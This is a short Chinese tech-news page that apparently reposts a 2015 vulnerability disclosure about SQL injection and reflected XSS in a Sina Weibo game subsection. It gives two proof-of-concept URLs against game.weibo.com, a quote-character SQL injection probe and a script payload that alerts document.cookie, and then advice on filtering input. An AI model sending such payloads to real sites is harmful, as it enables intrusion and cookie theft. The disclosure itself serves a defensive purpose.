精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

新浪微博子栏目漏洞可获取数据和cookie

2015-01-20 11:46 来源: 编辑:admin
新浪微博Cookie

新浪微博子栏目存在参数验证/过滤不严,导致的xss和sql inject。
sql inject:
http://game.weibo.com/mobile/index/topic?id=2'
xss:
http://game.weibo.com/mobile/detail/8888888%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C!--
漏洞证明:
 




 
修复方案:
严格过滤输入的参数,对数字进行int化,字符串限制特殊字符、转椅危险字符
  

标签
你喜欢的文章
返回首页
扫描微信
返回顶部